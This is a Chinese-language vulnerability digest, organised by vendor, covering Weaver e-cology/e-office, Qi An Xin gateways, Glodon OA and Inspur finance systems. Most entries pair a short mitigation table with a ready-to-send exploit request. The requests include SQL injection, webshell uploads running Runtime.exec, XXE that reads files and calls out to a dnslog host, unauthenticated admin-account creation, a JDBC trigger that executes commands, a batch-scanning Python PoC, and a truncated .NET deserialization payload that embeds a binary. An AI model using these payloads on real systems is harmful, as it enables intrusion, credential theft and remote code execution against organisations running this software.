以下漏洞均来源于互联网
泛微
泛微Ecology任意文件写入
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
8.0(10.65以下)9.0(10.62以下) |
未知 |
使用/security/monitor/Monitor.jsp接口更新 |
722 |
1day |
漏洞详情
未知
泛微E-office-10接口leave_record.php存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
10 |
/eoffice10/server/ext/system_support/leave_record.php |
WAF封禁路径,等待发布补丁 |
722 |
nday |
漏洞详情
GET /eoffice10/server/ext/system_support/leave_record.php?flow_id=1%27+AND+%28SELECT+4196+FROM+%28SELECT%28SLEEP%285%29%29%29LWzs%29+AND+%27zfNf%27%3D%27zfNf&run_id=1&table_field=1&table_field_name=user()&max_rows=10 HTTP/1.1
泛微e-cology 9 WorkflowServiceXml SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/services/WorkflowServiceXml |
WAF封禁路径,等待发布补丁 |
724 |
nday |
漏洞详情
POST /services/WorkflowServiceXml HTTP/1.1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver">
<soapenv:Header/>
<soapenv:Body>
<web:getHendledWorkflowRequestList>
<web:in0>1</web:in0>
<web:in1>1</web:in1>
<web:in2>1</web:in2>
<web:in3>1</web:in3>
<web:in4>
<web:string>1=1 AND 2=2</web:string>
</web:in4>
</web:getHendledWorkflowRequestList>
</soapenv:Body>
</soapenv:Envelope>
泛微云桥注入getshell
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
未知 |
等着 |
724 |
0day |
漏洞详情
未知
泛微E-Mobile移动管理平台installOperate.do存在SSRF漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SSRF |
未知 |
/install/installOperate.do |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
泛微e-cology9 存在SSRF漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SSRF |
9 |
/api/doc/mobile/fileview/getFileViewUrl |
WAF封禁路路径,等待发布补丁 |
725 |
nday |
漏洞详情
POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1
{
"file_id": "1000",
"file_name": "c",
"download_url":"http://euixlkewfg.dgrh3.cn"
}
泛微e-cology9接口WorkPlanService前台SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/services/WorkPlanService |
WAF封禁路路径,等待发布补丁 |
725 |
1day |
漏洞详情
POST /services/WorkPlanService HTTP/1.1
SOAPAction:
<soapenv:Envelope
<soapenv:Header/>
<soapenv:Body>
<web:deleteWorkPlan>
<!--type: string-->
<web:in0>(SELECT 8544 FROM
(SELECT(SLEEP(3-(IF(27=27,0,5)))))NZeo)</web:in0>
<!--type: int-->
<web:in1>22</web:in1>
</web:deleteWorkPlan>
</soapenv:Body>
</soapenv:Envelope>
泛微ecology SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/services/DocService |
WAF封禁路路径,等待发布补丁 |
725 |
0day |
漏洞详情
未知
泛微ecology SSRF漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SSRF |
未知 |
/services/DocService |
WAF封禁路路径,等待发布补丁 |
725 |
0day |
漏洞详情
未知
泛微OA E-Office V10 OfficeServer 任意文件上传
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/eoffice10/server/public/iWebOffice2015/OfficeServer.php |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'
Content-Length':'393'
Content-Type': 'multipart / form - data;boundary = ----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Accept - Encoding': 'gzip, deflate'
Connection':'close
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
Content-Disposition': 'form-data; name="FileData"; filename="1.jpg"
Content-Type': 'image/jpeg
<?php phpinfo();unlink(__FILE__);?>
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs",
Content-Disposition': 'form-data; name="FormData"
{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test12.php'}"
------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
泛微E-cology9 browserjsp SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/mobile/%20/plugin/browser.jsp |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
import argparse
import requests
from termcolor import colored
import signal
requests.packages.urllib3.disable_warnings()
output_file = None
def check_url(url, output=None):
headers = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Connection": "close"
}
proxies = {
'http': 'http://127.0.0.1:8080',
'https': 'https://127.0.0.1:8080'
}
data = {
"isDis": "1",
"browserTypeId": "269",
"keyword": "%25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%35%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37"
}
try:
modified_url = url + '/mobile/%20/plugin/browser.jsp'
response = requests.post(modified_url, data=data, headers=headers, verify=False, timeout=3)
content = response.text
if "show2" in content:
result = colored(url + " 存在", 'red')
if output:
with open(output, 'a') as file:
file.write(url + '\n')
print(result)
else:
result = url + " 不存在"
print(result)
except requests.exceptions.RequestException as e:
pass
def check_urls_from_file(filename, output=None):
with open(filename, 'r') as file:
url_list = file.read().strip().split('\n')
for url in url_list:
check_url(url, output)
signal.signal(signal.SIGINT, handle_interrupt)
def handle_interrupt(signum, frame):
global output_file
if output_file:
output_file.close()
print("\n扫描已中断并保存当前结果。")
exit()
def main():
global output_file
parser = argparse.ArgumentParser(description='CNVD-2023-12632检测POC')
parser.add_argument('-u', '--url', help='检测单个URL')
parser.add_argument('-r', '--file', help='从文本中批量检测URL')
parser.add_argument('-o', '--output', help='将检测到的输出到文本中')
args = parser.parse_args()
if args.output:
output_file = open(args.output, 'a')
if args.url:
check_url(args.url, args.output)
elif args.file:
check_urls_from_file(args.file, args.output)
else:
parser.print_help()
signal.signal(signal.SIGINT, handle_interrupt)
if output_file:
output_file.close()
泛微 ecology9 OA 系统SQL注入老洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
weaver/weaver.email.FileDownloadLocation |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
weaver/weaver.email.FileDownloadLocation?download=1&fileid=-2%20or%201=1
泛微HrmService存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/services/HrmService |
WAF封禁路路径,等待发布补丁 |
731 |
1day |
漏洞详情
POST /services/HrmService HTTP/1.1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:hrm="http://localhost/services/HrmService">
<soapenv:Header/>
<soapenv:Body>
<hrm:getHrmDepartmentInfo>
<!--type: string-->
<hrm:in0>gero et</hrm:in0>
<!--type: string-->
<hrm:in1>1)AND(db_name()like'ec%'</hrm:in1>
</hrm:getHrmDepartmentInfo>
</soapenv:Body>
</soapenv:Envelope>
泛微ecology系统setup接口存在信息泄露漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/cloudstore/ecode/setup/ecology_dev.zip |
WAF封禁路路径,等待发布补丁 |
731 |
nday |
漏洞详情
GET /cloudstore/ecode/setup/ecology_dev.zip HTTP/1.1
泛微 E-Cology XmlRpcServlet 文件读取漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 任意文件读取 |
未知 |
/weaver/org.apache.xmlrpc.webserver.XmlRpcServlet |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host:
<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
<methodName>WorkflowService.getAttachment</methodName>
<params>
<param>
<value><string>c://windows/win.ini</string></value>
</param>
</params>
</methodCall>
泛微 e-cology ReceiveCCRequestByXml 接口XXE漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| XXE |
未知 |
/rest/ofs/ReceiveCCRequestByXml |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1
Host:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://dnslog.cn">
<M><syscode>&send;</syscode></M>
泛微云桥 e-Bridge addResume任意文件上传漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/wxclient/app/recruit/resume/addResume |
WAF封禁路路径,等待发布补丁 |
807 |
1day |
漏洞详情
POST /wxclient/app/recruit/resume/addResume?fileElementld=111 HTTP/1.1
------WebKitFormBoundaryDOVhr5SwLI1wpry7
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
------WebKitFormBoundaryDOVhr5SwLI1wpry7--
1
------WebKitFormBoundaryDOVhr5SwLI1wpry7--
泛微E-Cology系统接口deleteRequestInfoByXml存在XXE漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| XXE |
未知 |
/rest/ofs/deleteRequestInfoByXml |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /rest/ofs/deleteRequestInfoByXml HTTP/1.1
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://hsdtcwwetk.dgrh3.cn">
<M><syscode>&send;</syscode></M>
泛微 e-office 10 schema_mysql.sql敏感信息泄露漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/eoffice10/empty_scene/db/schema_mysql.sql |
WAF封禁路路径,等待发布补丁 |
809 |
0day |
漏洞详情
GET /eoffice10/empty_scene/db/schema_mysql.sql HTTP/1.1
Host:
泛微e-cology workplanservice SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/services/WorkPlanService |
WAF封禁路路径,等待发布补丁 |
0814 |
nday |
漏洞详情
POST /services/WorkPlanService HTTP/1.1
HOST:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.workplan.weaver.com.cn">
<soapenv:Header/> <soapenv:Body>
<web:deleteWorkPlan>
<!--type: string--> <web:in0>(SELECT 8544 FROM
(SELECT(SLEEP(3-(IF(27=27,0,5)))))NZeo)</web:in0> <!--type: int-->
<web:in1>22</web:in1> </web:deleteWorkPlan>
</soapenv:Body> </soapenv:Envelope>
泛微运维平台存在任意管理员用户创建漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 越权漏洞 |
未知 |
/cp/hookenAddUser.json |
WAF封禁路路径,等待发布补丁 |
0814 |
1day |
漏洞详情
POST /cp/hookenAddUser.json HTTP/1.1
{"name":"ceshi","loginName":"BSWmjrqVrLui9nerRfFQFvtS1gbNbLDzYLembVIDnoeDn/h9Wo1a/zWCagouwDNGWIQyzueNs7+rai3mBvRuuJNRHtC/FoLpWIDLqiV9xkN9U/2hLHpVprnJcHQhjTx/79uP3wGHyhd95yjJgbXiocgfSWOwBJu4nUdQvX7p8O6NlD47FKDLFzeMAILaei4oDV7qqWdzF6tC+1fWAkdISDJYwkjTYZ0Vwb7qIq8dCj+7Juim4/I4xREPB86JhVuyQ4g5tTjvpmziUeby4uLfJJjDXCC3Gk2FrOOjNvZT+2Qk3xaqFvJ04rnn0eNL5XlFBXfpPa2WAbmJqEEUKy6NEw==","paw":"EaPqo3LKSnvE1FkfvPODn9QzNWGb24BGfvNRn0ScJ2w2bEY02TlJGaPQOo/1SmIpYkEplA4s69aWPsDQUlwDyZjnJHRa1VVgJAxkDYUhtiH5YJbLKmOwYMYqYygxQ0VaH6trV3jqQaLert+KuToc6YDA4cE4bTxEvPHbsuRTAJpQyibkDYVRRUjeTtgr/gUyiOH0OcbZnyDT2RGGdZNxeFkejU0/78vR5BpZ6DKSmmbPzQ4WGfgFtG4I4It3vy42wSorBatBFRp/sOZywIOzleVVs3IWLAQinKyythq9WjZXg7kxojge52njMdydaeTlH5zJMGtKFG/h1C8LRQax4Q==","roleid":"admin"}
泛微ecology系统接口BlogService存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/services/BlogService |
WAF封禁路路径,等待发布补丁 |
0823 |
nday |
漏洞详情
POST /services/BlogService HTTP/1.1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.blog.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:writeBlogReadFlag>
<web:string>1</web:string>
<web:string>注入点</web:string>
<web:string></web:string>
</web:writeBlogReadFlag>
</soapenv:Body>
</soapenv:Envelope>
泛微e-cology-v10远程代码执行漏洞-获取serviceTicketId
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/papi/passport/rest/appThirdLogin |
WAF封禁路路径,等待发布补丁 |
0823 |
1day |
漏洞详情
POST /papi/passport/rest/appThirdLogin HTTP/1.1
username=sysadmin&service=1&ip=1&loginType=third
泛微e-cology-v10远程代码执行漏洞-获取ETEAMSID
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/papi/passport/login/generateEteamsId |
WAF封禁路路径,等待发布补丁 |
0823 |
1day |
漏洞详情
POST /papi/passport/login/generateEteamsId HTTP/1.1
stTicket=ST-591-hEd3zpL4xVLMTe9hJ0wR-http://10.0.0.1
泛微e-cology-v10远程代码执行漏洞-加载org.h2.Driver
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/api/bs/iaauthclient/base/save |
WAF封禁路路径,等待发布补丁 |
0823 |
1day |
漏洞详情
POST /api/bs/iaauthclient/base/save HTTP/1.1
{"isUse":1,"auth_type":"custom","iaAuthclientCustomDTO":{"ruleClass":"org.h2.Driver"}}
泛微e-cology-v10远程代码执行漏洞-执行命令
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/api/dw/connSetting/testConnByBasePassword |
WAF封禁路路径,等待发布补丁 |
0823 |
1day |
漏洞详情
POST /api/dw/connSetting/testConnByBasePassword HTTP/1.1
{"dbType":"mysql5","dbUrl":"jdbc:h2:mem:test;MODE=MSSQLServer;init = CREATE TRIGGER hhhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ //javascript\njava.lang.Runtime.getRuntime().exec(\"{cmd}\")$$"}
泛微ecology9系统接口ModeDateService存在SQL漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/services/ModeDateService |
WAF封禁路路径,等待发布补丁 |
0826 |
1day |
漏洞详情
POST /services/ModeDateService HTTP/1.1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:mod="http://localhost/services/ModeDateService">
<soapenv:Header/>
<soapenv:Body>
<mod:getAllModeDataCount>
<mod:in0>1</mod:in0>
<mod:in1>1</mod:in1>
<mod:in2>1=1</mod:in2>
<mod:in3>1</mod:in3>
</mod:getAllModeDataCount>
</soapenv:Body>
</soapenv:Envelope>
奇安信
奇安信天擎EDR服务端V10 0day
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
V10 |
未知 |
等着 |
722 |
0day |
漏洞详情
未知
网神SecSSL3600安全接入网关系统任意密码修改漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 密码重置 |
全版本 |
/changepass.php |
等着 |
723 |
1day |
漏洞详情
POST /changepass.php?type=2 HTTP/1.1
host:
old_pass=&password=Test123!@&repassword=Test123!@
网康 NS-ASG sql 注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/admin/list_addr_fwresource_ip.php |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /admin/list_addr_fwresource_ip.php HTTP/1.1
ResId%5B%5D=13*&action=delete
网康 NS-ASG 信息泄露漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 信息泄露 |
未知 |
/configsave/manufacture-default.tar.gz |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
/configsave/manufacture-default.tar.gz
网神SecGate3600未授权添加用户漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/cgi-bin/authUser/authManageSet.cgi |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
type=saveAdmin&id=2&userName=audit&pwd=audit@1234&net=0.0.0.0&mask=0.0.0.0&port=ANY&allow=Y
广联达
广联达OA系统存在代码执行
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/gtp-default/reportServlet |
WAF封禁路径,等待发布补丁 |
722 |
0day |
漏洞详情
未知
广联达OA接口ArchiveWebService存在XML实体注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 注入 |
未知 |
/GB/LK/Document/ArchiveService/ArchiveWebService.asmx |
WAF封禁路径,等待发布补丁 |
723 |
nday |
漏洞详情
POST /GB/LK/Document/ArchiveService/ArchiveWebService.asmx HTTP/1.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<PostArchiveInfo xmlns="http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx">
<archiveInfo><!DOCTYPE Archive [
    <!ENTITY secret SYSTEM "file:///windows/win.ini">
]>

<Archive>  
    <ArchiveInfo>  
        <UploaderID>
############


&secret;


##############
</UploaderID>  
    </ArchiveInfo>  
    <Result>  
        <MainDoc>Document Content</MainDoc>  
    </Result>  
    <DocInfo>  
        <DocTypeID>1</DocTypeID>  
        <DocVersion>1.0</DocVersion>  
    </DocInfo>  
</Archive></archiveInfo>
<folderIdList>string</folderIdList>
<platId>string</platId>
</PostArchiveInfo>
</soap:Body>
</soap:Envelope>
广联达-Linkworks-GetAllData接口存在未授权访问
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/WebService/Lk6SyncService/MrMMSSvc/DataSvc.asmx/GetAllData |
WAF封禁路路径,等待发布补丁 |
726 |
nday |
漏洞详情
POST /WebService/Lk6SyncService/MrMMSSvc/DataSvc.asmx/GetAllData HTTP/1.1
Token=!@#$asdf$#@!&DataType=user
广联达OA系统GetSSOStamp接口存在任意用户登录
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| 未授权访问 |
未知 |
/WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /WebService/Lk6SyncService/DirectToOthers/GetSSOStamp.asmx HTTP/1.1
Host:
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetStamp xmlns="http://tempuri.org/">
<usercode>
admin</usercode>
</GetStamp>
</soap:Body>
</soap:Envelope>
广联达OA系统接口ConfigService.asmx存在SQL注入漏洞
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| SQL注入 |
未知 |
/Webservice/IM/Config/ConfigService.asmx |
WAF封禁路路径,等待发布补丁 |
807 |
nday |
漏洞详情
POST /Webservice/IM/Config/ConfigService.asmx HTTP/1.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetIMDictionary xmlns="http://tempuri.org/">
<key>1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from
T_ORG_USER --</key>
</GetIMDictionary>
</soap:Body>
</soap:Envelope>
浪潮
浪潮云财务系统存在命令执行
| 漏洞类型 |
涉及版本 |
利用路径 |
处置建议 |
情报获取时间 |
0day/1day/nday |
| RCE |
未知 |
/cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx |
WAF封禁路径,等待发布补丁 |
722 |
0day |
漏洞详情
POST /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx HTTP/1.1
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetChildFormAndEntityList xmlns="http://tempuri.org/">
<baseFormID>string</baseFormID>
<baseEntityID>string</baseEntityID>
<strFormAssignment>AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAMctAAACAAEAAAD/////AQAAAAAAAAAEAQAAAH9TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAwAAAAZfaXRlbXMFX3NpemUIX3ZlcnNpb24FAAAICAkCAAAACgAAAAoAAAAQAgAAABAAAAAJAwAAAAkEAAAACQUAAAAJBgAAAAkHAAAACQgAAAAJCQAAAAkKAAAACQsAAAAJDAAAAA0GBwMAAAABAQAAAAEAAAAHAgkNAAAADA4AAABhU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49MzFiZjM4NTZhZDM2NGUzNQUEAAAAalN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbC5TZXJpYWxpemF0aW9uLkFjdGl2aXR5U3Vycm9nYXRlU2VsZWN0b3IrT2JqZWN0U3Vycm9nYXRlK09iamVjdFNlcmlhbGl6ZWRSZWYCAAAABHR5cGULbWVtYmVyRGF0YXMDBR9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyDgAAAAkPAAAACRAAAAABBQAAAAQAAAAJEQAAAAkSAAAAAQYAAAAEAAAACRMAAAAJFAAAAAEHAAAABAAAAAkVAAAACRYAAAABCAAAAAQAAAAJFwAAAAkYAAAAAQkAAAAEAAAACRkAAAAJGgAAAAEKAAAABAAAAAkbAAAACRwAAAABCwAAAAQAAAAJHQAAAAkeAAAABAwAAAAcU3lzdGVtLkNvbGxlY3Rpb25zLkhhc2h0YWJsZQcAAAAKTG9hZEZhY3RvcgdWZXJzaW9uCENvbXBhcmVyEEhhc2hDb2RlUHJvdmlkZXIISGFzaFNpemUES2V5cwZWYWx1ZXMAAAMDAAUFCwgcU3lzdGVtLkNvbGxlY3Rpb25zLklDb21wYXJlciRTeXN0ZW0uQ29sbGVjdGlvbnMuSUhhc2hDb2RlUHJvdmlkZXII7FE4PwIAAAAKCgMAAAAJHwAAAAkgAAAADw0AAAAAEAAAAk1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEUAAEwBAwBrydRkAAAAAAAAAADgAAIhCwELAAAIAAAABgAAAAAAAN4mAAAAIAAAAEAAAAAAABAAIAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAgAAAAAIAAAAAAAADAECFAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAACQJgAASwAAAABAAACoAgAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAgAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAAOQGAAAAIAAAAAgAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACoAgAAAEAAAAAEAAAACgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAABgAAAAAgAAAA4AAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAwCYAAAAAAABIAAAAAgAFADAhAABgBQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbMAMAwwAAAAEAABECKAMAAAooBAAACgoGbwUAAApvBgAACgZvBwAACm8IAAAKcwkAAAoLB28KAAAKcgEAAHBvCwAACgZvDAAACm8NAAAKchEAAHBvDgAACgwHbwoAAApyGQAAcAgoDwAACm8QAAAKB28KAAAKF28RAAAKB28KAAAKF28SAAAKB28KAAAKFm8TAAAKB28UAAAKJgdvFQAACm8WAAAKDQZvBwAACglvFwAACt4DJt4ABm8HAAAKbxgAAAoGbwcAAApvGQAACioAARAAAAAAIgCHqQADDgAAAUJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAALwBAAAjfgAAKAIAAHQCAAAjU3RyaW5ncwAAAACcBAAAJAAAACNVUwDABAAAEAAAACNHVUlEAAAA0AQAAJAAAAAjQmxvYgAAAAAAAAACAAABRxQCAAkAAAAA+iUzABYAAAEAAAAOAAAAAgAAAAEAAAAZAAAAAgAAAAEAAAABAAAAAwAAAAAACgABAAAAAAAGACkAIgAGAFYANgAGAHYANgAKAKgAnQAKAMAAnQ